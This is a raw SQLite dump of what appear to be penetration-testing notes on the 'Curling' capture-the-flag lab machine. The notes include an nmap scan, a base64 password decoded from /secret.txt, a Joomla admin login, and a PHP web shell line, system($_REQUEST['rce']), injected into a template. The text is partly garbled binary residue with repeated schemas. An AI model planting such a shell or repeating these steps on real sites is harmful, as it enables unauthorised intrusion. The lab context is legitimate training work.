SQLite format 3 @ -
Y /C indexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image (
node_id INTEGER,
offset INTEGER,
justification TEXT,
anchor TEXT,
png BLOB,
filename TEXT,
link TEXT,
time INTEGER
)
wtablegridgridCREATE TABLE grid (
node_id INTEGER,
offset INTEGER,
justification TEXT,
txt TEXT,
col_min INTEGER,
col_max INTEGER
)btablecodeboxcodeboxCREATE TABLE codebox (
node_id INTEGER,
offset INTEGER,
justification TEXT,
txt TEXT,
syntax TEXT,
width INTEGER,
height INTEGER,
is_width_pix INTEGER,
do_highl_bra INTEGER,
do_show_linenum INTEGER
)mtablenodenodeCREATE TABLE node (
node_id INTEGER UNIQUE,
name TEXT,
txt TEXT,
syntax TEXT,
tags TEXT,
is_ro INTEGER,
is_richtxt INTEGER,
has_codebox INTEGER,
has_table INTEGER,
has_image INTEGER,
level INTEGER,
ts_creation INTEGER,
ts_lastsave INTEGER
)'; indexsqlite_autoindex_node_1node m'
Niktocustom-colors$A?&oA?&*%}'
Web ServicesJoomla running on port 80
Source-code finds /secret.txt = Q3VybGluZzIwMTgh
Base64 -d = Curling2018!
Joomla posts name Floris
/administrator found in Dirbuster
Login to administrator with floris:Curling2018! successful
Protostar Template code exploited to add RCE code = system($_REQUEST['rce']);
RCE Successful.custom-colors"AנЙд9k'
UDPcustom-colors$A?&ЍA[?Lk'
TCPcustom-colors$A?&A[>CX#9'
Enumerationnmap -sC -sV -oA ./Curling 10.10
A }wqke_YSMGA " !
!
vne\SJA8/&
"!
B ~xrlf`ZTNHB " !
Y /C indexsqlite_autoindex_children_1children tableimageimageCREATE TABLE /C indexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image (
node_id INTEGER,
offset INTEGER,
justification TEXT,
anchor TEXT,
png BLOB,
filename TEXT,
link TEXT,
time INTEGER
)
wtablegridgridCREATE TABLE grid (
node_id INTEGER,
offset INTEGER,
justification TEXT,
txt TEXT,
col_min INTEGER,
col_max INTEGER
)btablecodeboxcodeboxCREATE TABLE codebox (
node_id INTEGER,
offset INTEGER,
justification TEXT,
txt TEXT,
syntax TEXT,
width INTEGER,
height INTEGER,
is_width_pix INTEGER,
do_highl_bra INTEGER,
do_show_linenum INTEGER
)mtablenodenodeCREATE TABLE node (
node_id INTEGER UNIQUE,
name TEXT,
txt TEXT,
syntax TEXT,
tags TEXT,
is_ro INTEGER,
is_richtxt INTEGER,
has_codebox INTEGER,
has_table INTEGER,
has_image INTEGER,
level INTEGER,
ts_creation INTEGER,
ts_lastsave INTEGER
)'; indexsqlite_autoindex_node_1node
' s\+ _tablebookmarkbookmarkCREATE TABLE bookmark (
node_id INTEGER UNIQUE,
sequence INTEGER
)/ C indexsqlite_autoindex_bookmark_1bookmark /C indexsqlite_autoindex_children_1childrenr7tablechildrenchildrenCREATE TABLE children (
node_id INTEGER UNIQUE,
father_id INTEGER,
sequence INTEGER
) tableimageimageCREATE TABLE image (
node_id INTEGER,
offset INTEGER,
justification TEXT,
anchor TEXT,
png BLOB,
filename TEXT,
link TEXT,
time INTEGER
)
wtablegridgridCREATE TABLE grid (
node_id INTEGER,
offset INTEGER,
justification TEXT,
txt TEXT,
col_min INTEGER,
col_max INTEGER
)
https://nmap.org ) at 2020-03-30 19:25 EDT
Nmap scan report for 10.10.10.150
Host is up (0.069s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.97 seconds
custom-colors*AנLdj
x n x m'
Niktocustom-colors$A?&oA?&*%}'
Web ServicesJoomla running on port 80
Source-code finds /secret.txt = Q3VybGluZzIwMTgh
Base64 -d = Curling2018!
Joomla posts name Floris
/administrator found in Dirbuster
Login to administrator with floris:Curling2018! successful
Protostar Template code exploited to add RCE code = system($_REQUEST['rce']);
RCE Successful.custom-colors"AנЙд9k'
UDPcustom-colors$A?&ЍA[?Lk'
TCPcustom-colors$A?&A[>CX#9'
Enumerationnmap -sC -sV -oA ./Curling 10.10.10.150
Starting Nmap 7.80 (